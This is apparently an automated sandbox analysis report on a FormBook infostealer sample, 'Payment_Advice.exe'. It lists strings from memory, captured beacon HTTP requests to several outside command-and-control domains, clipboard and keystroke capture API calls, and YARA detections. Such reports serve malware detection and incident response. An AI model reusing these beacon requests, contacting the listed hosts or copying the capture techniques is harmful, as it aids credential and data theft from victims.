          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000F.00000000.1596839591.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: explorer.exe, 0000000F.00000002.3891932584.000000001279F000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.000000000418F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.im-newbie-journal.online/hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXF
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: unknownDNS traffic detected: queries for: www.othersidewear.com
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001ED7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,6_2_001ED7A1
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.othersidewear.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.91fulizifen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.shayun.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.brownkrosshui.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.usbulletinnow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.im-newbie-journal.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.tygyro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.87b52.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 06 Oct 2023 13:47:05 GMTContent-Type: text/htmlContent-Length: 673Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 61 79 75 6e 2e 6e 65 74 2f 68 65 73 66 2f 3f 6a 42 5a 3d 72 42 42 6d 37 39 79 57 6a 2f 30 73 63 54 75 33 35 6e 42 54 6a 65 66 48 42 33 79 48 46 52 2f 39 75 4e 38 49 58 6f 69 30 44 52 62 67 4d 62 64 32 63 6e 4d 76 73 5a 59 58 46 75 70 73 48 51 33 6d 71 79 37 4a 26 61 6d 70 3b 47 76 77 3d 54 34 52 70 69 74 50 70 46 74 42 4c 78 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 6a 36 63 64 77 37 33 6f 71 39 37 32 73 39 73 37 78 6a 68 78 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 31 30 2f 30 36 20 32 31 3a 34 37 3a 30 35 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&amp;Gvw=T4RpitPpFtBLx</td></tr><tr><td>Server:</td><td>izj6cdw73oq972s9s7xjhxz</td></tr><tr><td>Date:</td><td>2023/10/06 21:47:05</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 06 Oct 2023 13:48:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Contains functionality to modify clipboard data
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_001EF6C7
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_001DA54A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_001EF45C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_001EF45C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00209ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00209ED5

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.3875577794.00000000106B5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
